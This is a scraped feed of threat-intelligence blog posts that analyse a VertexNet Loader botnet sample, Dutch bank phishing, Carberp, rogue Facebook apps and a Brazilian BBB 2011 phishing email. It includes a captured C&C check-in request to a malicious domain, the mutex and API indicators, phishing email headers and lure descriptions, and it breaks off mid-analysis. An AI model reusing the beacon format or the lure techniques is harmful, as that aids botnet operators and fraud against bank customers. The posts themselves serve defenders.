<b style="background-color: white; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">PE information & sections:</span></b><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"> 57.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)</span></i><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i style="background-color: white;"> </i><i>12.2% (.DLL) Win32 Dynamic Link Library (generic) (6581/28/2)</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i style="background-color: white;"> </i><i>12.0% (.EXE) Win32 Executable Generic (6514/8/2)</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i style="background-color: white;"> </i><i>10.3% (.EXE) Win64 Executable Generic (5563/38/1)</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i style="background-color: white;"> </i><i>3.7% (.EXE) Generic Win/DOS Executable (2002/3)</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Mutex: VN_MUTEX16</span><br />
<a href="http://2.bp.blogspot.com/-gZXOMUZw9YA/T_Zs0Kt-wRI/AAAAAAAAAiU/w44cJ_5T_Xw/s1600/05-07-2012+0-21-27.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="78" src="http://2.bp.blogspot.com/-gZXOMUZw9YA/T_Zs0Kt-wRI/AAAAAAAAAiU/w44cJ_5T_Xw/s400/05-07-2012+0-21-27.png" width="400" /></a><i><span style="font-family: Arial, Helvetica, sans-serif;">Optional Header: 0x400000</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;">Address Of Entry Point: <span class="Apple-tab-span" style="white-space: pre;"> </span>0xaf4a</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;">Compile Time: 2011-06-20 11:05:05</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;">Number of RVA and Sizes: 16</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;">Number of Sections: 5</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></i><br />
<b style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">API Functions:</span></b><br />
<br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"> </span>InternetReadFile</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"> </span>CreateProcess</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"> </span>WinExec</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"> </span>ShellExecute</span></i><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"> </span>URLDownloadToFileA</span></i><br />
<br />
<span style="background-color: white; color: orange; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.virustotal.com/file/bf679313741fe95cee973d63929c263b02c7ddf1786f0495d9c45fb03d5acac4/analysis/" style="background-color: white; font-family: Arial, Helvetica, sans-serif;" target="_blank">VT information</a></span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> about detection rate </span><b style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="color: red;">35</span>/42 </b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>VN_MUTEX16</b> </span><span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">is the string that is set as default "mutex" through internal constructor VertexNet Loader:</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-UvtRFYoAx-c/T_ZtVwqEyzI/AAAAAAAAAic/ZLYOrbJG_UY/s1600/04-07-2012+23-55-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="http://2.bp.blogspot.com/-UvtRFYoAx-c/T_ZtVwqEyzI/AAAAAAAAAic/ZLYOrbJG_UY/s400/04-07-2012+23-55-58.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; text-align: justify;">This information corresponds to the default settings when creating the bot through the internal constructor:</span><br />
<div class="MsoNoSpacing">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-DYGlc6c4dgk/T_ZtoZ4cU5I/AAAAAAAAAik/BwJPRfwqnvI/s1600/updt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="367" src="http://4.bp.blogspot.com/-DYGlc6c4dgk/T_ZtoZ4cU5I/AAAAAAAAAik/BwJPRfwqnvI/s400/updt.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Information report in the C&C statistics
panel about infected machine:</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-zIlPLWkrE4g/T_ZtvEToyRI/AAAAAAAAAis/j2VVYCNz9a8/s1600/04-07-2012+23-47-19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="http://3.bp.blogspot.com/-zIlPLWkrE4g/T_ZtvEToyRI/AAAAAAAAAis/j2VVYCNz9a8/s400/04-07-2012+23-47-19.png" width="400" /></a></div>
<div class="MsoNoSpacing">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing" style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">This information is inserted into the database</span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> (default MySQL) of the crimeware. </span><span lang="EN-US" style="background-color: white; font-family: Arial, Helvetica, sans-serif;">You
can see this information/C&C communication in traffic capture:</span></div>
<div class="MsoNoSpacing">
<span lang="EN-US">
</span></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif; font-size: 10pt;">
<br /></div>
<div class="MsoNoSpacing" style="font-size: 10pt; text-align: left;">
<i><span lang="EN-US"><span style="font-family: 'Courier New', Courier, monospace;">GET /x1/adduser.php?<b>uid=</b>{52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing" style="font-size: 10pt; text-align: left;">
<i><span lang="EN-US"><span style="font-family: 'Courier New', Courier, monospace;">&<b>lan=</b>XXX.XXX.XXX.XXX&<b>cmpname=</b>XXXXXXXXXX-59903E%20[Administrator]&<b>country=</b> &<b>idle=</b>0&<b>ver=</b>v1.2
HTTP/1.1<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing" style="font-size: 10pt; text-align: left;">
<i><span lang="EN-US"><span style="font-family: 'Courier New', Courier, monospace;">User-Agent: V32<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing" style="font-size: 10pt; text-align: left;">
<i><span lang="EN-US"><span style="font-family: 'Courier New', Courier, monospace;">Host: tinker.vn</span><span style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif; font-size: 10pt;">
<br /></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif; text-align: center;">
<i><span lang="EN-US">You
can read more information about the functions, command and extract data in
infected machine for this crimeware in <b>Malware<span style="color: blue;">Intelligence</span></b> post: <a href="http://malwareint.blogspot.com/2012/07/vertexnet-loader-crimeware-timeline.html" target="_blank">VertexNetLoader crimeware timeline, popular functions and marketing scheme</a><span style="font-size: x-small;"><o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif; font-size: 10pt;">
<br />
<br /></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif; font-size: 10pt;">
<b><span lang="EN-US" style="font-size: 14pt;">VertexNet Loader crimeware C&C<o:p></o:p></span></b></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif;">
<span lang="EN-US">In this
case, the malicious software have you control panel in hxxp://tinker.vn/x1/<o:p></o:p></span></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif;">
<span lang="EN-US"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-O-B8WW6UpZM/T_ZuZpXm5uI/AAAAAAAAAi0/zAoGycoRa4A/s1600/05-07-2012+0-19-09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="http://4.bp.blogspot.com/-O-B8WW6UpZM/T_ZuZpXm5uI/AAAAAAAAAi0/zAoGycoRa4A/s400/05-07-2012+0-19-09.png" width="400" /></a></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif;">
<br /></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif;">
** Information obtained through the automated process malware analysis of <b>CrimewareAttack Service</b> (by <span style="background-color: white;"> <b>Malware<span style="color: blue;">Intelligence</span></b></span><span style="background-color: white;">).</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.twitter.com/MalwareInt" target="_blank"><img border="0" height="135" src="http://3.bp.blogspot.com/-f1ynt36hKps/T_Z4vA5lJnI/AAAAAAAAAjA/GszFQ_A_YG0/s200/MalwareInt-Twitter.png" width="200" /></a></div>
<span style="background-color: white;"><br /></span></div>
<div class="MsoNoSpacing" style="font-family: Arial, Helvetica, sans-serif;">
<span lang="EN-US"></span></div>
<div class="MsoNoSpacing">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Alex</span></div><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-56749013041216653042011-04-12T02:44:00.000+01:002015-09-02T00:59:07.723+01:00Increase in Dutch banking phishing<div style="text-align: justify;">
The last few months there was an increase in a phishing campaign targeted on customers from Rabobank and ING, two major banks in The Netherlands and Belgium. Some examples of a phishing mail:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-i-DM77ulMIw/TaOsYMNJvZI/AAAAAAAAAcQ/FThX3p6hn3I/s1600/p1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://1.bp.blogspot.com/-i-DM77ulMIw/TaOsYMNJvZI/AAAAAAAAAcQ/FThX3p6hn3I/s400/p1.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Phishing email for ING with the subject “Account Verificatie” (or in English: “Account Verification”) </i></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-doKHmpomUpk/TaOsiVkm37I/AAAAAAAAAcU/4eBNn8hOk54/s1600/p2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-doKHmpomUpk/TaOsiVkm37I/AAAAAAAAAcU/4eBNn8hOk54/s400/p2.jpg" width="372" /></a></div>
<div style="text-align: center;">
<i>Phishing email for Rabobank with the subject “Customer Services Update”.</i></div>
<br />
<div style="text-align: justify;">
If you speak the Dutch language, you notice the content of the emails are actually more different than most phishing mails. In fact there’s a bigger variety, and in the first version there is almost no grammatical or spelling error. The second email - for Rabobank- however, is clearly a Google Translate copy/paste job.</div>
<br />
<div style="text-align: justify;">
All emails seem to be originating from valid email addresses, domains are pointing to @rabobank.nl and @ing.nl , which are in fact legitimate addresses from the two banks.<br />
However, if we check the message headers we can see IP’s originating from Nigeria:</div>
<br />
<a href="http://whois.domaintools.com/41.155.32.70" style="color: orange;">41.155.32.70</a> – <a href="http://ipvoid.com/scan/41.155.32.70" style="color: orange;">IPVoid results</a><br />
<a href="http://whois.domaintools.com/82.128.38.67" style="color: orange;">82.128.38.67</a> – <a href="http://ipvoid.com/scan/82.128.38.67" style="color: orange;">IPVoid results</a><br />
<br />
<div style="text-align: justify;">
Another IP address is originating from New Zealand and is actually blacklisted on several blacklists, as can be confirmed when checking with IPVoid:</div>
<br />
<a href="http://whois.domaintools.com/203.97.33.68" style="color: orange;">203.97.33.68</a> – <a href="http://ipvoid.com/scan/203.97.33.68" style="color: orange;">IPVoid results</a><br />
<br />
<div style="text-align: justify;">
This means the email-addresses are spoofed to trick users into believing the email is valid.<br />
Now, what happens if you click on the link included in the message? You will be redirected to any of these pages: </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-qpDcW43u_hg/TaOstD0-c8I/AAAAAAAAAcY/HiyDUKBT_TY/s1600/p3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="303" src="http://3.bp.blogspot.com/-qpDcW43u_hg/TaOstD0-c8I/AAAAAAAAAcY/HiyDUKBT_TY/s400/p3.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Phishing website for ING. The user needs to login with his/her username and password. You can also opt to login with the ‘calculator’. The calculator is in fact a card reader which you can use to login.</i></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-M2ajwiuHOVo/TaOs3ATjGYI/AAAAAAAAAcc/ydE9F89XE58/s1600/p4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="http://3.bp.blogspot.com/-M2ajwiuHOVo/TaOs3ATjGYI/AAAAAAAAAcc/ydE9F89XE58/s400/p4.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Phishing website for Rabobank. You can login using your account number, access code, and PIN code. You can also use your card reader.</i></div>
<br />
<div style="text-align: justify;">
The intention of these emails is of course to steal user credentials and empty the account of the duped user. These attacks are pretty well orchestrated. If you click on any of the links on the phishing page, it will redirect you to the real ING website which provides extra information on the topic you clicked on.</div>
<br />
The following tips do not only apply to the above story, but apply to any other (suspicious) email you receive:<br />
<ul>
<li>Do not click on any of the links (or anything for that matter) in the email you have received.</li>
<li>Do not reply to the email.</li>
<li>Delete the email immediately, certainly if you are not a customer of the aforementioned bank or did not order anything, changed your password, and so on.</li>
<li>If you really need to access or check your bank account, visit the website directly by typing the address in your browser’s address bar. Also verify the URL starts with https instead of http.</li>
<li>Another useful trick is to hover over the link in the email. In the bottom left corner you should be able to see the real address behind the URL displayed.</li>
<li>When in doubt, you can double-check using URL scanning services such as<a href="http://www.virustotal.com/"> <span style="color: orange;">VirusTotal</span></a> or <a href="http://www.urlvoid.com/" style="color: orange;">URLVoid</a> by <a href="http://www.malwareint.com/part.html" style="color: orange;">our partner</a> <a href="http://www.novirusthanks.org/" style="color: orange;">NoVirusThanks</a>.</li>
</ul>
<br />
MalwareIntelligence Team<div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-24032274174126014422011-02-21T10:06:00.000+00:002011-02-21T13:53:01.196+00:00New whitepaper about Carberp Botnet<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-YTDEO3DuLQc/TWE8PvEFz_I/AAAAAAAAAb8/0uJEfYLuNr0/s1600/inside-carberp-botnet-en.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://1.bp.blogspot.com/-YTDEO3DuLQc/TWE8PvEFz_I/AAAAAAAAAb8/0uJEfYLuNr0/s200/inside-carberp-botnet-en.png" width="141" /></a></div><div style="text-align: justify;">Is available a <a href="http://www.malwareint.com/docs.html" style="color: orange;">new whitepaper</a> that describes the operation of one of the botnets "wanted" by the security community:<b> Carberp</b>.<br />
<br />
The article, called <b>Inside Carberp Botnet</b> and written by Francisco Ruiz, Crimeware Research of <b>Malware<span style="color: blue;">Intelligence</span></b>, details the different parts of this crimeware, leaving evidence of its full operating mode.<br />
<br />
In recent weeks, has returned to Carberp impact due to the revival of several of his former C&C. However, experts believe <b>Malware<span style="color: blue;">Intelligence</span></b> have concrete evidence that would demonstrate that in fact the original group that was behind the first generation of Carberp is broken, and that some of the new botnets that spread banking trojan Carberp are managed through a modified version of the original.<br />
<br />
<b>Malware<span style="color: blue;">Intelligence</span></b> have a <b>Carberp Working Group</b>, responsible for private research and demand of this particular threat. <a href="http://malwareint.blogspot.com/2011/02/inside-carberp-botnet.html" style="color: orange;">In the main blog</a>, Ruiz also said that a botnet Carberp private market in a very closed environment, but since a few days ago, the marketing model has been released, giving some details of its current features and costs.</div><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-2254834146329362822011-02-14T20:10:00.000+00:002015-09-02T00:59:24.086+01:00Facebook rogue applications still lurking aroundFor quite some time now there are rogue applications trying to convince you that you are able to check whoever viewed your profile. There are a lot of different names for this rogue application, some but not all include:<br />
<ul>
<li>creep exterminators</li>
<li>catch them being creepy</li>
<li>creepy profile peekers</li>
<li>privacy bros </li>
<li>we catch stalkers </li>
</ul>
<div style="text-align: justify;">
So what will this fake application do? For starters, it will surely NOT show you who's been viewing your profile. If you land on this application, you will be presented with the following screen:</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-OKjJhNlwTEw/TVmJP3wj1NI/AAAAAAAAAbU/YW48C6idk_8/s1600/MI-MD_prof.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="246" src="http://4.bp.blogspot.com/-OKjJhNlwTEw/TVmJP3wj1NI/AAAAAAAAAbU/YW48C6idk_8/s400/MI-MD_prof.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Profile Creeps application</b></i></span></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-pQjYVyGADSQ/TVmQaJ2U03I/AAAAAAAAAbk/QNyHDyXs7A0/s1600/MI-MD-face.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="221" src="http://3.bp.blogspot.com/-pQjYVyGADSQ/TVmQaJ2U03I/AAAAAAAAAbk/QNyHDyXs7A0/s400/MI-MD-face.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Request for permission</b></i></span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
You then have to allow access from the application so they can show you who's been lurking around your profile. But wait ! You first have to complete a survey and then you are able to check it out. Simple, right?</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-MRI6PsEgGvk/TVmJ6GQot1I/AAAAAAAAAbc/PS2-GLV-EEk/s1600/MI-MD_fee.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="299" src="http://3.bp.blogspot.com/-MRI6PsEgGvk/TVmJ6GQot1I/AAAAAAAAAbc/PS2-GLV-EEk/s400/MI-MD_fee.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Facebook verification</b></i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Not exactly. These fake surveys are pretty common on the internet. It is a typical scam. For example, I had one particular survey that urged me to download SmileyCentral, the other tried to deliver me Webfetti.</div>
<ul>
<li><a href="http://www.virustotal.com/file-scan/report.html?id=3aea99720c89ca1b6552e0b10624cf6ad86d65bad6e659599019c9029bdcec8b-1297697679" style="color: orange;">9ed197b533fdf53ab8cf9e83a1b5951d</a> (<b>Webfetti.exe</b>)</li>
<li><a href="http://www.virustotal.com/file-scan/report.html?id=ef70b622c8b53c4f286127151ff41be799896de49d0d10e75a673bffcea7ee30-1297688529" style="color: orange;">ff8d221113615909b07b1ba9ceb8466a</a> (<b>SmileyCentralPFSetup2.3.78.2.NoSA.NoHP.ZNfox000.exe</b>)</li>
</ul>
<br />
<div style="text-align: justify;">
Another fake survey wanted me to fill in my phone number, and afterwards send an (expensive) text message to 'unlock' the application. In addition to letting you fall into one of these scams, the rogue application also promotes itself on all of your friends’ walls:</div>
<br />
<br />
<br />
<br />
<br />
<center>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/--A7VvN-kr18/TVmKNJ5kAjI/AAAAAAAAAbg/Bb9LMs4E5G4/s1600/MI-MD_rogue.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="66" src="http://1.bp.blogspot.com/--A7VvN-kr18/TVmKNJ5kAjI/AAAAAAAAAbg/Bb9LMs4E5G4/s400/MI-MD_rogue.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Rogue application spreading itself on other people’s wall</b></i></span></td></tr>
</tbody></table>
</center>
<br />
<div style="text-align: center;">
<span style="font-size: x-small;"><i><b></b></i></span></div>
<br />
If you would like to remove it, follow the steps below:<br />
<ul>
<li style="text-align: justify;">Go to your Facebook profile. Find the post that mentions the "stalker" application</li>
<li style="text-align: justify;">Skim over it and you will see an X appear. Click on it and choose "Remove (name of the fake application here)". </li>
<li style="text-align: justify;">Additionally, you can also report it as abusive to help in stopping these type of applications.</li>
<li style="text-align: justify;">Next step is to click on My Account and choose Privacy Settings. Down below you can see "Apps and websites". Click on Edit your settings. </li>
<li style="text-align: justify;">Select Remove unwanted or spammy apps. You can now Edit the application and remove it.</li>
</ul>
<br />
MalwareIntelligence Team<div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-84356821745957676662011-01-30T15:47:00.000+00:002011-01-30T15:48:42.881+00:00Big Brother Brazil 2011 (AKA BBB 2011) malware attack<div style="text-align: justify;">Big Brother 2011 (AKA BBB 2011) begins in Brazil and it's a motivation for social engineering attacks.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Big Brother Brasil 2011 began on January 11th in Brazil and malware authors should be celebrating, thus, because this is something very popular so it's easy to attract victims (via social engineering) to 'see' videos or pictures of the BBB 2011 participants.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">We will show you a threat which came in form of a phishing and using social engineering ask recipients to click in a link in order to watch a video of a transsexual which is making the man's participants of the BBB 2011 confused.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">As you can see on the original e-mail below, the attacker uses a technique known as DHA (<a href="http://en.wikipedia.org/wiki/Directory_Harvest_Attack" style="color: orange;">Directory Harvest Attack</a>) against the @hotmail.com domain in order to send the phishing message to valid e-mail addresses.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TUV6w2H7yzI/AAAAAAAAAaw/1zfX6MLXWXU/s1600/1-MI_First-Phishing+Message+received.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TUV6w2H7yzI/AAAAAAAAAaw/1zfX6MLXWXU/s400/1-MI_First-Phishing+Message+received.JPG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<div style="text-align: justify;">Note that when you move the mouse to the link which appears that will get you to the youtube.com, on the status bar you can see that it will not get you to the youtube.com website. It will get you to the website hxxp://twurl.nl/rbpm6s.</div><br />
Below you have the source code of the phishing message:<br />
<br />
----------------------------------------------------------------<br />
<i><span style="font-size: x-small;">X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtTQ0w9Ng==</span></i><br />
<i><span style="font-size: x-small;">X-Message-Status: n</span></i><br />
<i><span style="font-size: x-small;">X-SID-PRA: globo.com (BBB 2011) </span></i><communications_msn_cs_ptbr@microsoft.windowslive.com><i><span style="font-size: x-small;"><br />
X-SID-Result: Fail<br />
X-DKIM-Result: None<br />
X-AUTH-Result: FAIL<br />
X-Message-Info: DkpufaDli9Iih8M1I3rOCBHB3/E1htFb2qXrXVLfpfjlNFuHVG90WYrx2zq5Mw1fmsHKOjL4weQGCOatyx0Pn7FYN0czafnY9kSTqtv24cY=<br />
Received: from wl01.ws.poa.ige ([201.94.125.1]) by col0-mc3-f16.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675);<br />
Tue, 18 Jan 2011 10:21:08 -0800<br />
Received: from wl01.ws.poa.ige (dcrs8211 [127.0.0.1])<br />
by wl01.ws.poa.ige (8.13.8/8.13.8) with ESMTP id p0IH1auJ030937;<br />
Tue, 18 Jan 2011 15:01:36 -0200<br />
Received: (from httpd@localhost)<br />
by wl01.ws.poa.ige (8.13.8/8.13.8/Submit) id p0IH1ZXl030933;<br />
Tue, 18 Jan 2011 15:01:35 -0200<br />
To: baa@hotmail.com, bbb@hotmail.com, bcc@hotmail.com,<br />
bdd@hotmail.com, bee@hotmail.com<br />
Subject: ariadna (transesual) no bbb 2011 deixa homens confuso....<br />
X-PHP-Script: mylove2010.info/catastrofe/feed10.php for 187.57.247.86<br />
Date: Tue, 18 Jan 2011 15:01:34 -0200<br />
From: "globo.com (BBB 2011)" </span></i><communications_msn_cs_ptbr@microsoft.windowslive.com><i><span style="font-size: x-small;"><br />
Reply-to: "globo.com (BBB 2011)" </span></i><communications_msn_cs_ptbr@microsoft.windowslive.com><i><span style="font-size: x-small;"><br />
Message-ID: <63a5faa6442cd3b2f870f2ac7a99bde7@mylove2010.info><br />
X-Priority: 3<br />
X-Mailer: Microsoft Outlook Express 6.00.2800.1409<br />
X-MimeOLE: Produced By Microsoft MimeOLE V6.10.2800.1409.1718742875.rg.sm31<br />
MIME-Version: 1.0<br />
Content-Transfer-Encoding: 8bit<br />
Content-Type: text/html; charset="iso-8859-1"<br />
Return-Path: httpd@wl01.ws.poa.ige</span></i><br />
----------------------------------------------------------------<br />
<br />
As you can see on the source code, this phishing message involves three main characteristics:</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<ol><li><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <i>A file named feed10.php</i></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> A file named ariedina.jpg3</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> A link pointing to the website hxxp://twurl.nl/rbpm6s.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
</ol><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TUV8pbvI-ZI/AAAAAAAAAa4/qGykMcNWTew/s1600/2-MI_second-feed10-php.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="294" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TUV8pbvI-ZI/AAAAAAAAAa4/qGykMcNWTew/s400/2-MI_second-feed10-php.JPG" width="400" /></a></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <b> </b></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><b>Analyzing the file feed10.php</b><br />
I have downloaded this script page by using the webget utility. See the screenshot below:<br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
